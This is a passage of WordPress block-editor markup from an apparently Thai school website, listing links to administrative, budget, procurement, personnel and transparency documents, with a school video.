href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 